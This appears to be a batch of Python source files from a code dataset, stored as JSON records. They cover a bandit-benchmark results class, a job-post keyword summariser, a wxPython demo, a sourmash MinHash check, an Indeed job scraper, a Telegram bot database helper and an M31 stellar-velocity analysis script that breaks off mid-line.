Table:\n \"\"\"The collection of simulations used to evaluate each learner in the Benchmark. The easiest\n way to work with simulations is to convert to a dataframe via Result.simulations.to_pandas()\n \"\"\"\n return self._simulations\n\n @property\n def interactions(self) -> InteractionsTable:\n \"\"\"The collection of interactions that learners chose actions for in the Benchmark. Each interaction\n has a simulation_id and learner_id column to link them to the learners and simulations tables. The \n easiest way to work with interactions is to convert to a dataframe via Result.interactions.to_pandas()\n \"\"\"\n return self._interactions\n\n def _copy(self) -> 'Result':\n result = Result()\n\n result.simulations = copy(self._simulations)\n result.learners = copy(self._learners)\n result.interactions = copy(self._interactions)\n\n return result\n\n def filter_fin(self) -> 'Result':\n\n def is_complete_sim(sim_id):\n return all((sim_id, lrn_id) in self.interactions for lrn_id in self.learners.keys)\n\n new_result = copy(self)\n new_result._simulations = self.simulations.filter(simulation_id=is_complete_sim)\n new_result._interactions = self.interactions.filter(simulation_id=is_complete_sim)\n\n if len(new_result.simulations) == 0:\n CobaConfig.Logger.log(f\"No simulation was found with interaction data for every learner.\")\n\n return new_result\n\n def filter_sim(self, pred:Callable[[Dict[str,Any]],bool] = None, **kwargs) -> 'Result':\n\n new_result = copy(self)\n new_result._simulations = new_result.simulations.filter(pred, **kwargs)\n new_result._interactions = new_result.interactions.filter(simulation_id=new_result.simulations)\n\n if len(new_result.simulations) == 0:\n CobaConfig.Logger.log(f\"No simulations matched the given filter: {kwargs}.\")\n\n return new_result\n\n def filter_lrn(self, pred:Callable[[Dict[str,Any]],bool] = None, **kwargs) -> 'Result':\n new_result = copy(self)\n new_result._learners = new_result.learners.filter(pred, **kwargs)\n new_result._interactions = new_result.interactions.filter(learner_id=new_result.learners)\n\n if len(new_result.learners) == 0:\n CobaConfig.Logger.log(f\"No learners matched the given filter: {kwargs}.\")\n\n return new_result\n\n def plot_learners(self, \n xlim: Optional[Tuple[Number,Number]] = None,\n ylim: Optional[Tuple[Number,Number]] = None,\n span: int = None,\n err : Optional[str] = None,\n each: bool = False,\n ax = None) -> None:\n \"\"\"This plots the performance of multiple Learners on multiple simulations. It gives a sense of the expected \n performance for different learners across independent simulations. This plot is valuable in gaining insight \n into how various learners perform in comparison to one another. \n\n Args:\n xlim: Define the x-axis limits to plot. If `None` the x-axis limits will be inferred.\n ylim: Define the y-axis limits to plot. If `None` the y-axis limits will be inferred.\n span: In general this indicates how many previous evaluations to average together. In practice this works\n identically to ewm span value in the Pandas API. Additionally, if span equals None then all previous \n rewards are averaged together vs span = 1 WHERE the instantaneous reward is plotted for each interaction.\n err: Determine what kind of error bars to plot (if any). Valid types are `None`, 'se', and 'sd'. If `None`\n then no bars are plotted, if 'se' the standard error is shown, and if 'sd' the standard deviation is shown.\n each: Determine whether each constituent observation used to estimate mean performance is also plotted.\n ax: Provide an optional axes that the plot will be drawn to. If not provided a new figure/axes is created.\n \"\"\"\n\n PackageChecker.matplotlib('Result.plot_learners')\n import matplotlib.pyplot as plt #type: ignore\n import numpy as np #type: ignore\n\n progressives: Dict[int,List[Sequence[float]]] = collections.defaultdict(list)\n\n for progressive in self.interactions.to_progressive_list(each=True):\n progressives[progressive[0]].append(progressive[2:])\n\n if not progressives:\n return\n \n show = ax is None\n\n if ax is None:\n ax = plt.figure(figsize=(10,6)).add_subplot(111) #type: ignore\n\n for learner_id in sorted(self.learners.keys, key=lambda id: self.learners[id][\"full_name\"]):\n\n color = next(ax._get_lines.prop_cycler)['color']\n\n label = self._learners[learner_id][\"full_name\"]\n Z = list(zip(*progressives[learner_id]))\n \n if not Z: continue\n\n N = [ len(z) for z in Z ]\n Y = [ sum(z)/len(z) for z in Z ]\n X = list(range(1,len(Y)+1))\n\n start = xlim[0] if xlim else int(.05*len(X))\n end = xlim[1] if xlim else len(X)\n\n if start >= end:\n CobaConfig.Logger.log(\"The plot's end is less than the start making plotting impossible.\")\n return\n\n X = X[start:end]\n Y = Y[start:end]\n Z = Z[start:end]\n\n if len(X) == 0: continue\n\n #this is much faster than python's native stdev\n #and more or less free computationally so we always\n #calculate it regardless of if they are showing them\n #we are using the identity Var[Y] = E[Y^2]-E[Y]^2\n Y2 = [ sum([zz**2 for zz in z])/len(z) for z in Z ]\n SD = [ (round(y2-y**2,8))**(1/2) for y,y2 in zip(Y,Y2) ]\n SE = [ sd/(n**(1/2)) for sd,n in zip(SD,N) ]\n\n yerr = 0 if err is None else SE if err.lower() == 'se' else SD if err.lower() == 'sd' else 0\n ax.errorbar(X, Y, yerr=yerr, elinewidth=0.5, errorevery=(0,max(int(len(X)*0.05),1)), label=label, color=color)\n\n if each:\n for Y in list(zip(*Z)):\n ax.plot(X,Y, color=color, alpha=0.15)\n\n padding = .05\n ax.margins(0)\n ax.set_xticks(np.clip(ax.get_xticks(), *ax.get_xlim()))\n ax.margins(padding)\n\n if xlim:\n x_pad = padding*(xlim[1]-xlim[0])\n ax.set_xlim(xlim[0]-x_pad, xlim[1]+x_pad)\n\n if ylim:\n y_pad = padding*(ylim[1]-ylim[0])\n ax.set_ylim(ylim[0]-y_pad, ylim[1]+y_pad)\n\n ax.set_title((\"Instantaneous\" if span == 1 else \"Progressive\" if span is None else f\"Span {span}\") + \" Reward\", loc='left',pad=15)\n ax.set_ylabel(\"Reward\")\n ax.set_xlabel(\"Interactions\")\n\n if ax.get_legend() is None:\n scale = 0.65\n box1 = ax.get_position()\n ax.set_position([box1.x0, box1.y0 + box1.height * (1-scale), box1.width, box1.height * scale])\n else:\n ax.get_legend().remove()\n\n ax.legend(*ax.get_legend_handles_labels(), loc='upper left', bbox_to_anchor=(-.01, -.25), ncol=1, fontsize='medium') #type: ignore\n\n if show:\n plt.show()\n\n def __str__(self) -> str:\n return str({ \"Learners\": len(self._learners), \"Simulations\": len(self._simulations), \"Interactions\": len(self._interactions) })\n\n def __repr__(self) -> str:\n return str(self)\n\nclass ResultPromote(Filter):\n\n CurrentVersion = 3\n\n def filter(self, items: Iterable[Any]) -> Iterable[Any]:\n items_iter = iter(items)\n items_peek = next(items_iter)\n items_iter = chain([items_peek], items_iter)\n\n version = 0 if items_peek[0] != 'version' else items_peek[1]\n\n if version == ResultPromote.CurrentVersion:\n raise StopPipe()\n\n while version != ResultPromote.CurrentVersion:\n if version == 0:\n promoted_items = [[\"version\",1]]\n\n for transaction in items:\n\n if transaction[0] == \"L\":\n\n index = transaction[1][1]['learner_id']\n values = transaction[1][1]\n\n del values['learner_id']\n\n promoted_items.append([transaction[0], index, values])\n\n if transaction[0] == \"S\":\n\n index = transaction[1][1]['simulation_id']\n values = transaction[1][1]\n\n del values['simulation_id']\n\n promoted_items.append([transaction[0], index, values])\n\n if transaction[0] == \"B\":\n key_columns = ['learner_id', 'simulation_id', 'seed', 'batch_index']\n \n index = [ transaction[1][1][k] for k in key_columns ]\n values = transaction[1][1]\n \n for key_column in key_columns: del values[key_column]\n \n if 'reward' in values:\n values['reward'] = values['reward'].estimate\n \n if 'mean_reward' in values:\n values['reward'] = values['mean_reward'].estimate\n del values['mean_reward']\n\n values['reward'] = round(values['reward', 5])\n\n promoted_items.append([transaction[0], index, values])\n\n items = promoted_items\n version = 1\n\n if version == 1:\n\n n_seeds : Optional[int] = None\n S_transactions: Dict[int, Any] = {}\n S_seeds : Dict[int, List[Optional[int]]] = collections.defaultdict(list)\n\n B_rows: Dict[Tuple[int,int], Dict[str, List[float]] ] = {}\n B_cnts: Dict[int, int ] = {}\n\n promoted_items = [[\"version\",2]]\n\n for transaction in items:\n\n if transaction[0] == \"benchmark\":\n n_seeds = transaction[1].get('n_seeds', None)\n\n del transaction[1]['n_seeds']\n del transaction[1]['batcher']\n del transaction[1]['ignore_first']\n\n promoted_items.append(transaction)\n\n if transaction[0] == \"L\":\n promoted_items.append(transaction)\n\n if transaction[0] == \"S\":\n S_transactions[transaction[1]] == transaction\n\n if transaction[0] == \"B\":\n S_id = transaction[1][1]\n seed = transaction[1][2]\n L_id = transaction[1][0]\n B_id = transaction[1][3]\n \n if n_seeds is None:\n raise StopPipe(\"We are unable to promote logs from version 1 to version 2\")\n\n if seed not in S_seeds[S_id]:\n S_seeds[S_id].append(seed)\n \n new_S_id = n_seeds * S_id + S_seeds[S_id].index(seed)\n new_dict = S_transactions[S_id][2].clone()\n \n new_dict[\"source\"] = str(S_id)\n new_dict[\"filters\"] = f'[{{\"Shuffle\":{seed}}}]'\n\n B_cnts[S_id] = new_dict['batch_count']\n\n promoted_items.append([\"S\", new_S_id, new_dict])\n\n if B_id == 0: B_rows[(S_id, L_id)] = {\"N\":[], \"reward\":[]}\n\n B_rows[(S_id, L_id)][\"N\" ].append(transaction[2][\"N\"])\n B_rows[(S_id, L_id)][\"reward\"].append(transaction[2][\"reward\"])\n\n if len(B_rows[(S_id, L_id)][\"N\"]) == B_cnts[S_id]:\n promoted_items.append([\"B\", [S_id, L_id], B_rows[(S_id, L_id)]])\n del B_rows[(S_id, L_id)]\n\n items = promoted_items\n version = 2\n\n if version == 2:\n\n promoted_items = [[\"version\",3]]\n\n for transaction in items:\n \n #upgrade all reward entries to the packed format which will now allow array types and dict types.\n if transaction[0] == \"B\":\n rewards = transaction[2][\"reward\"]\n del transaction[2][\"reward\"]\n transaction[2][\"_packed\"] = {\"reward\": rewards}\n \n #Change from B to I to be consistent with result property name: `interactions`\n if transaction[0] == \"B\": \n transaction[0] = \"I\"\n \n promoted_items.append(transaction)\n\n items = promoted_items\n version = 3\n\n return items\n","sub_path":"coba/benchmarks/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":25454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"156057207","text":"#coding=utf8\n\nimport html2text\nimport re\nimport json\nfrom collections import defaultdict\nfrom nlp_utils import lemmatized_tokens, get_unigrams, get_bigrams\nfrom utils import *\nfrom tfidf import tfidf, idf\n\n\ndef load_preprocess_data(input_file):\n job_posts = []\n\n with open(input_file) as f:\n for j_text in f.read().strip().split('\\n'):\n j = json.loads(j_text)\n job_posts.append(j)\n\n for j in job_posts:\n j['headers'] = []\n j['feature_sentence'] = defaultdict(list)\n header = ''\n description_text = html2text.html2text(j['description'])\n for sentence in description_text.split('\\n'):\n if re.search(r'\\A\\*\\*\\b[a-zA-Z]+\\b', sentence):\n header = sentence\n j['headers'].append(header)\n if sentence.strip().startswith('* ') | sentence.strip().startswith(u'· '):\n j['feature_sentence'][header].append(sentence)\n return job_posts\n\n\ndef build_tfidf_model(job_posts, nlp_module='stanford'):\n tokens_list = []\n total_tokens = []\n idf_map = {}\n\n for j in job_posts:\n j['tokens'] = []\n for header, sentences in j['feature_sentence'].items():\n for sent in sentences:\n sent = clean_sentence(sent)\n tokens = []\n if not sent:\n continue\n word_list = lemmatized_tokens(sent, nlp_module)\n unigram_tokens = get_unigrams(word_list)\n tokens.extend(unigram_tokens)\n bigram_tokens = get_bigrams(word_list)\n tokens.extend(bigram_tokens)\n j['tokens'].extend(tokens)\n tokens_list.append(j['tokens'])\n total_tokens.extend(j['tokens'])\n\n unique_tokens = list(set(total_tokens))\n for token in unique_tokens:\n idf_map[token] = idf(token, tokens_list)\n return idf_map\n\n\ndef evaluate_keywords(job_posts, evaluated_idf, selection=0.1):\n for j in job_posts:\n tfidfs = {}\n for token in j['tokens']:\n if token in tfidfs:\n continue\n tfidfs[token] = tfidf(token, j['tokens'], evaluated_idf)\n sorted_tfidfs = sorted(tfidfs.items(), key=lambda x: -x[1])\n top_count = int(round(len(sorted_tfidfs)*selection))\n keywords = [i[0] for i in sorted_tfidfs[:top_count]]\n j['keywords'] = keywords\n\n\ndef evaluate_summary(job_posts):\n for j in job_posts:\n summary = []\n\n for header in j['headers']:\n summary.append(header)\n if header in j['feature_sentence']:\n filtered = filter_sentences(j['feature_sentence'][header], j['keywords'])\n summary.extend(filtered)\n j['summary'] = '\\n'.join(summary)\n\n\ndef dump_processed_data(job_posts, output_file):\n for j in job_posts:\n del j['headers']\n del j['tokens']\n del j['feature_sentence']\n\n with open(output_file, 'w') as f:\n for j in job_posts:\n j_text = json.dumps(j)\n f.write(j_text)\n f.write('\\n')\n\n","sub_path":"snippet_generation/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"516379971","text":"# -*- coding: utf-8 -*-\n\nimport wx\nimport numpy\nimport matplotlib.pyplot as plt\nimport xlrd\n\ndef name(workbook):\n\tsheet2=workbook.sheet_by_index(1)\n\trow_0=sheet2.row_values(0)\n\treturn row_0\n\ndef EvtComboBox(evt):\n cb = evt.GetEventObject()\n\napp=wx.App()\nwin=wx.Frame(None,title=\"Simple Editor\",size=(410,100))\nbkg=wx.Panel(win)\n\nfilename=wx.TextCtrl(bkg)\nfile_name=wx.StaticText(bkg,-1,\"TestFile \")\n\nopenButton=wx.Button(bkg, label='open')\nopenButton.Bind(wx.EVT_BUTTON,name)\n\ntablenames=name(xlrd.open_workbook(filename.GetValue()))\n\ncb = wx.ComboBox(bkg, 500, \"default value\", (90, 50), \n (160, -1), tablenames,\n wx.CB_DROPDOWN\n #| wx.TE_PROCESS_ENTER\n #| wx.CB_SORT\n )\n\nbkg.Bind(wx.EVT_COMBOBOX, EvtComboBox, cb)\n\n\n\nhbox=wx.BoxSizer()\nhbox.Add(cb,proportion=0,flag=wx.LEFT)\nhbox.Add(file_name,proportion=0,flag=wx.LEFT)\nhbox.Add(filename,proportion=1,flag=wx.LEFT)\n\nvbox=wx.BoxSizer(wx.VERTICAL)\nvbox.Add(hbox,proportion=0,flag=wx.EXPAND | wx.ALL, border=5)\nbkg.SetSizer(vbox)\n\nwin.Show()\n\napp.MainLoop()","sub_path":"wx_choice_02.py","file_name":"wx_choice_02.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"410198183","text":"#! /usr/bin/env python\n\"\"\"\nUse the MurmurHash library mmh3 and separate Python code to calculate\na MinHash signature for input protein sequence, as a way to do an\nexternal check on our C++ implementation.\n\nThe output of this is used in test_sourmash.py to verify our C++ code.\n\"\"\"\n\ndna_to_aa={'TTT':'F','TTC':'F', 'TTA':'L','TTG':'L',\n 'TCT':'S','TCC':'S','TCA':'S','TCG':'S',\n 'TAT':'Y','TAC':'Y', 'TAA':'*','TAG':'*','TGA':'*',\n 'TGT':'C','TGC':'C', 'TGG':'W',\n 'CTT':'L','CTC':'L','CTA':'L','CTG':'L',\n 'CCT':'P','CCC':'P','CCA':'P','CCG':'P',\n 'CAT':'H','CAC':'H', 'CAA':'Q','CAG':'Q',\n 'CGT':'R','CGC':'R','CGA':'R','CGG':'R',\n 'ATT':'I','ATC':'I','ATA':'I', 'ATG':'M',\n 'ACT':'T','ACC':'T','ACA':'T','ACG':'T',\n 'AAT':'N','AAC':'N', 'AAA':'K','AAG':'K',\n 'AGT':'S','AGC':'S', 'AGA':'R','AGG':'R',\n 'GTT':'V','GTC':'V','GTA':'V','GTG':'V',\n 'GCT':'A','GCC':'A','GCA':'A','GCG':'A',\n 'GAT':'D','GAC':'D', 'GAA':'E','GAG':'E',\n 'GGT':'G','GGC':'G','GGA':'G','GGG':'G'}\n\n\n__complementTranslation = { \"A\": \"T\", \"C\": \"G\", \"G\": \"C\", \"T\": \"A\", \"N\": \"N\" }\ndef complement(s):\n \"\"\"\n Return complement of 's'.\n \"\"\"\n c = \"\".join(__complementTranslation[n] for n in s)\n return c\n\n\ndef reverse(s):\n \"\"\"\n Return reverse of 's'.\n \"\"\"\n r = \"\".join(reversed(s))\n return r\n\n\ndef peptides(seq, start):\n for i in range(start, len(seq), 3):\n yield dna_to_aa.get(seq[i:i+3], \"X\")\n\n\ndef translate(seq):\n for i in range(3):\n pep = peptides(seq, i)\n yield \"\".join(pep)\n\n revcomp = reverse(complement((seq)))\n for i in range(3):\n pep = peptides(revcomp, i)\n yield \"\".join(pep)\n\ndef kmers(seq, k):\n for start in range(len(seq) - k + 1):\n yield seq[start:start + k]\n\n###\n\nK = 21\n\nimport sys, screed\nimport mmh3\nimport sourmash\nprint('imported sourmash:', sourmash, file=sys.stderr)\nimport sourmash.signature\n\nrecord = next(iter(screed.open(sys.argv[1])))\nprint('loaded', record.name, file=sys.stderr)\n\nmh = sourmash.MinHash(ksize=K, n=500, is_protein=True)\nprot_ksize = int(K / 3)\n\nfor kmer in kmers(record.sequence, prot_ksize):\n hash = mmh3.hash64(kmer, seed=42)[0]\n\n # convert to unsigned int if negative\n if hash < 0:\n hash += 2**64\n\n mh.add_hash(hash)\n\ns = sourmash.signature.SourmashSignature('', mh, name=record.name)\nprint(sourmash.signature.save_signatures([s]))\n","sub_path":"utils/compute-input-prot-another-way.py","file_name":"compute-input-prot-another-way.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488451098","text":"import requests\nfrom bs4 import BeautifulSoup\n\nLIMIT = 50\nURL = f\"http://indeed.com/jobs?q=python&limit={LIMIT}\"\n\n\ndef get_last_page():\n result = requests.get(URL)\n soup = BeautifulSoup(result.text, \"html.parser\")\n pagination = soup.find(\"div\", {\"class\": \"pagination\"})\n links = pagination.find_all(\"a\")\n pages = []\n for link in links[:-1]:\n pages.append(int(link.string))\n\n last_page = pages[-1]\n return last_page\n\n\ndef extract_job(soup):\n job_title = soup.find(\"h2\", {\"class\": \"jobTitle\"})\n title = job_title.find(\"span\").string\n if title == \"new\":\n title = job_title.find_all(\"span\")[1].string\n company = soup.find(\"span\", {\"class\": \"companyName\"}).string\n location = soup.find(\"div\", {\"class\": \"companyLocation\"}).text\n job_id = soup[\"data-jk\"]\n\n return {\n \"title\": title,\n \"company\": company,\n \"location\": location,\n \"apply_link\": f\"https://www.indeed.com/viewjob?jk={job_id}\"}\n\n\ndef extract_jobs(last_pages):\n jobs = []\n for page in range(last_pages):\n print(f\"Scrapping Indeed page {page}\")\n result = requests.get(f\"{URL}&start={page*LIMIT}\")\n soup = BeautifulSoup(result.text, \"html.parser\")\n results = soup.find_all(\"a\", {\"class\": \"resultWithShelf\"})\n for result in results:\n job = extract_job(result)\n jobs.append(job)\n\n return jobs\n\n\ndef get_jobs():\n last_page = get_last_page()\n jobs = extract_jobs(last_page)\n return jobs\n","sub_path":"indeed.py","file_name":"indeed.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69038915","text":"\"\"\"\nTitle : Find a String\nSubdomain : Challenges/Strings\nDomain : Python\nAuthor : Sai Ram Adidela\nCreated : 20 April 2018\n\"\"\"\n\n\ndef count_substring(s, sub_s):\n no = 0\n for i in range(len(s)):\n if s[i:].startswith(sub_s):\n no += 1\n return no\n\n\nif __name__ == '__main__':\n string = input().strip()\n sub_string = input().strip()\n\n count = count_substring(string, sub_string)\n print(count)\n","sub_path":"challenges/strings/find_string.py","file_name":"find_string.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"638397085","text":"# -*- coding: utf-8 -*-\nimport json\nimport sqlite3\nimport config\nimport datetime\nfrom vedis import Vedis\n\n\ndef set_state(user_id, value):\n with Vedis(config.db_file) as db:\n try:\n db[user_id] = value\n return True\n except KeyError:\n # тут желательно как-то обработать ситуацию\n return False\n\n\ndef get_current_state(user_id):\n with Vedis(config.db_file) as db:\n try:\n print('{} with {}'.format(user_id, db[user_id]))\n return db[user_id]\n except KeyError:\n return config.States.S_START.value # значение по умолчанию - начало диалога\n\n\nclass SessionDb:\n\n def create_session_with_source(self, user_id, source):\n value = {\n 'source': source,\n 'destination': '',\n 'last_date': '',\n 'type': '',\n 'dr_source': '',\n 'dr_destination': '',\n }\n\n value = json.dumps(value)\n with Vedis(config.session_file) as db:\n try:\n db[user_id] = value\n return True\n except KeyError:\n # тут желательно как-то обработать ситуацию\n return False\n\n def get_session(self, user_id):\n with Vedis(config.session_file) as db:\n try:\n # print('{} with {}'.format(user_id, db[user_id]))\n value = json.loads(db[user_id])\n return value\n except KeyError:\n return 'no session for this user'\n\n def update_session(self, user_id, source=None, destination=None, last_date=None, type=None,\n dr_source=None, dr_destination=None):\n with Vedis(config.session_file) as db:\n try:\n print('{} with {}'.format(user_id, db[user_id]))\n value = db[user_id]\n value = json.loads(value)\n if source is not None:\n value['source'] = source\n elif destination is not None:\n value['destination'] = destination\n elif last_date is not None:\n value['last_date'] = last_date\n elif type is not None:\n value['type'] = type\n elif dr_source is not None:\n value['dr_source'] = dr_source\n elif dr_destination is not None:\n value['dr_destination'] = dr_destination\n value = json.dumps(value)\n db[user_id] = value\n return db[user_id]\n except KeyError:\n return 'no session for this user'\n\n\nclass DBHelper:\n def __init__(self, dbname=\"data.sqlite\"):\n self.dbname = dbname\n self.conn = sqlite3.connect(dbname, check_same_thread=False)\n self.setup()\n\n def setup(self):\n stmt = \"CREATE TABLE IF NOT EXISTS orders (id integer primary key, \" \\\n \"user text, \" \\\n \"source text, \" \\\n \"destination text, \" \\\n \"last_date text,\" \\\n \"type text,\" \\\n \"created_datetime datetime)\"\n self.conn.execute(stmt)\n self.conn.commit()\n\n def add_order(self, user, source, destination, last_date, type):\n now = datetime.datetime.now()\n stmt = \"INSERT INTO orders (user, source, destination, last_date, type, \" \\\n \"created_datetime) VALUES (?, ?, ?, ?, ?, ?)\"\n args = (user, source, destination, last_date, type, now)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def get_own_orders(self, username):\n stmt = \"SELECT * FROM orders where user = (?)\"\n args = (username,)\n items = []\n for row in self.conn.execute(stmt, args):\n items.append(row)\n print(items)\n return items\n\n def delete_order(self, id):\n stmt = \"DELETE FROM orders WHERE id = (?)\"\n args = (id,)\n self.conn.execute(stmt, args)\n self.conn.commit()\n\n def delete_all(self):\n stmt = \"DELETE * FROM orders\"\n self.conn.execute(stmt)\n self.conn.commit()\n\n def get_orders(self):\n stmt = \"SELECT * FROM orders\"\n items = []\n for row in self.conn.execute(stmt):\n items.append(row)\n print(items)\n return items\n\n def drop_table(self):\n stmt = \"DROP TABLE orders\"\n self.conn.execute(stmt)\n print('dropped')\n return 'done'\n\n def search_order(self, source, destination):\n items = list()\n stmt = \"SELECT * FROM orders WHERE source = (?) AND destination = (?)\"\n args = (source, destination)\n for row in self.conn.execute(stmt, args):\n items.append(row)\n return items\n","sub_path":"dbhelper.py","file_name":"dbhelper.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"382136437","text":"import numpy as np \nfrom astropy.io import fits\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord, EarthLocation\nfrom astropy import constants as const\nfrom astropy.time import Time\n\n#original data ================================================================================================================================\nhdu = fits.open('/Users/amandaquirk/Documents/AsymmetricDrift/Data/subMasterSPLASH.fits', memmap = True)\ndata = hdu[1].data\nra = data['RA']\ndec = data['Dec']\nredshift = data['Z']\ntime = data['MJD']\naband = data['ABAND']\nprint('read in subMasterSPLASH')\n\n#read in data from age groups =================================================================================================================\ndef read_data(agebin):\n\t#xi, eta, verr, n, HI, index in subMasterSPLASH\n\tage_data = np.loadtxt('/Users/amandaquirk/Documents/AsymmetricDrift/Data/{}_individual_chemin.txt'.format(agebin), usecols=(0, 1, 3, 4, 5, 8), unpack=True)\n\treturn age_data\n\nMS_data = read_data('MS')\nAGy_data = read_data('AGy')\nAGo_data = read_data('AGo')\nRG_data = read_data('RG')\nprint('read in age data')\n\n#correct the velocities ======================================================================================================================\nkeck = EarthLocation.from_geodetic(lat=19.8283*u.deg, lon=-155.4783*u.deg, height=4160*u.m)\n\ndef correct_vel(data_array):\n\tinds = data_array[-1]\n\tinds = [int(a) for a in inds]\n\n\tras = ra[inds]\n\tdecs = dec[inds]\n\tsc = SkyCoord(ra=ras, dec=decs, unit=(u.hourangle, u.deg))\n\ttimes = time[inds]\n\tzs = redshift[inds]\n\tabands = aband[inds]\n\n\theliocorr = sc.radial_velocity_correction('heliocentric', obstime=Time(times, format='mjd'), location=keck) \n\theliocorr_km_s = heliocorr.to(u.km/u.s) \n\tvraw = zs * const.c.to(u.km/u.s)\n\tvcorr = vraw + heliocorr_km_s - abands * const.c.to(u.km/u.s)\n\n\treturn vcorr.value #km/s\n\nMS_v = correct_vel(MS_data)\nAGy_v = correct_vel(AGy_data)\nAGo_v = correct_vel(AGo_data)\nRG_v = correct_vel(RG_data)\nprint('did velocity corrections')\n\n#smoothing data ============================================================================================================================\n#function to calculate the weights\ndef calc_weights(err):\n return 1 / (err**2)\n\ndef normed_weight(w):\n sum_weights=sum(w)\n return w / sum_weights\n\n#function does the weighted meean\ndef weighted_mean(data,norm_w):\n\treturn sum(data * norm_w)\n\n#function does the weighted RMSE\ndef weighted_rmse(norm_w, data, mean):\n\tdiff_sq = (data - mean)**2\n\treturn np.sqrt(sum(diff_sq * norm_w))\n\ndef smoothing(data_array, velocities, circleSize):\n\tsmoothed_v = []\n\tdispersion = []\n\t#below these values are not actually smoothed, just saving the ones for good centers\n\txi_goodcenter = []\n\teta_goodcenter = []\n\tsmoothed_n = []\n\tsmoothed_err = []\n\tsmoothed_HI = []\n\tsmoothed_ind = []\n\n\t#remove stars that have unreliable velocities\n\treliable = abs(velocities) < 1000\n\tras = data_array[0][reliable]\n\tdecs = data_array[1][reliable]\n\terrs = data_array[2][reliable]\n\tns = data_array[3][reliable]\n\tHI = data_array[4][reliable]\n\tind = data_array[5][reliable]\n\tvelocities = velocities[reliable]\n\n\tweight = calc_weights(errs) #error is already adjusted so can just calculate the weights\n\tsc = SkyCoord(ra=ras, dec=decs, unit=(u.deg,u.deg))\n\tfor i in range(len(ras)):\n\t\tc1 = SkyCoord(ras[i], decs[i], unit=(u.deg,u.deg)) #go through all coordinates one at a time\n\t\tsep = c1.separation(sc)\n\t\tgood = sep.arcsecond < circleSize #put stars into smoothing circle of this size\n\t\tvelocities_circ = velocities[good]\n\t\tweight_circ = weight[good]\n\t\tif len(velocities_circ) > 15: #only want circles with at least 15 stars\n\t\t\tnormed_weights = normed_weight(weight_circ)\n\t\t\tsmoothed_v.append(weighted_mean(velocities_circ, normed_weights)) #average the velocites\n\t\t\tdispersion.append(weighted_rmse(normed_weights, velocities_circ, weighted_mean(velocities_circ, normed_weights)))\n\t\t\txi_goodcenter.append(ras[i] * 13.67) #kpc\n\t\t\teta_goodcenter.append(decs[i]* 13.67) #kpc\n\t\t\tsmoothed_n.append(ns[i])\n\t\t\tsmoothed_err.append(errs[i])\n\t\t\tsmoothed_HI.append(HI[i])\n\t\t\tsmoothed_ind.append(ind[i])\n\treturn xi_goodcenter, eta_goodcenter, smoothed_v, smoothed_err, dispersion, smoothed_HI, smoothed_n, smoothed_ind\n\nMS_smoothed_data = smoothing(MS_data, MS_v, 200)\nprint('done with MS smoothing')\nAGy_smoothed_data = smoothing(AGy_data, AGy_v, 275)\nprint('done with AGy smoothing')\nAGo_smoothed_data = smoothing(AGo_data, AGo_v, 275)\nprint('done with AGo smoothing')\nRG_smoothed_data = smoothing(RG_data, RG_v, 200)\nprint('done with RG smoothing')\n\n# #calculating rotation velocity =================================================================================================================\n#deproject coordinates\ndef x(xi, eta): #xi and eta in kpc\n\txi_deg = xi / 13.67\n\teta_deg = eta / 13.67\n\tsine = np.sin(37 * np.pi / 180)\n\tcosine = np.cos(37 * np.pi / 180)\n\tx =(xi_deg * cosine) - (eta_deg * sine)\n\treturn x \n\ndef y(xi, eta): #xi and eta in kpc\n\txi_deg = xi / 13.67\n\teta_deg = eta / 13.67\n\tsine = np.sin(37 * np.pi / 180)\n\tcosine = np.cos(37 * np.pi / 180)\n\ty = (eta_deg * cosine) + (xi_deg * sine)\n\treturn y\n\n#calculate the position angle -- THIS FUNCTION NEEDS TO BE MODIFIED IF Y < 0\ndef PA(xi, eta): #xi and eta in kpc\n\tx_coord = x(xi, eta)\n\ty_coord = y(xi, eta)\n\tdeg = np.zeros_like(x_coord)\n\tfor i in range(len(x_coord)):\n\t\tif x_coord[i] > 0:\n\t\t\trad = np.arctan(y_coord[i] / x_coord[i])\n\t\t\tdeg[i] = 90 - rad * 180 / np.pi\n\t\telse:\n\t\t\trad = np.arctan(y_coord[i] / x_coord[i])\n\t\t\tdeg[i] = 270 - rad * 180 / np.pi\n\treturn deg + 37 #incorporate tilt of M31\n\n#calculate deprojected radial distance\ndef distance(xi, eta): #xi and eta in kpc\n\tx_coord = x(xi, eta)\n\ty_coord = y(xi, eta)\n\tinclination_factor = np.cos(77 * np.pi / 180)**2\n\tang_dist = np.sqrt(y_coord**2 + x_coord**2 / inclination_factor)\n\treturn ang_dist * 13.67\n\n#bring in the ringed HI data for tilted ring model\nHI_r, HI_PA, HI_i, HI_v = np.loadtxt('/Users/amandaquirk/Documents/AsymmetricDrift/Data/HI_PA_i_vrot.txt', unpack=True)\nHI_PA = np.array(HI_PA)\nHI_i = np.array(HI_i)\n\ndef find_nearest_ring(radius):\n\tindices = np.zeros_like(radius)\n\tfor i in range(len(radius)):\n\t\tdiff = abs(HI_r - radius[i])\n\t\tindices[i] = int(np.argmin(diff))\n\treturn indices #index of the radius closest to the star's radius\n\n#rotation velocity using tilted ring model\ndef Vrot_tilted_ring(xi, eta, v): #LOS v\n\tPA_star = PA(xi, eta)\n\tr = distance(xi, eta)\n\n\t#HI ring parameters \n\tHI_inds = find_nearest_ring(r)\n\tPA_ring = np.zeros(len(HI_inds))\n\ti_ring = np.zeros(len(HI_inds))\n\tfor i in range(len(r)):\n\t\tN = int(HI_inds[i])\n\t\tPA_ring[i] = HI_PA[N]\n\t\ti_ring[i] = 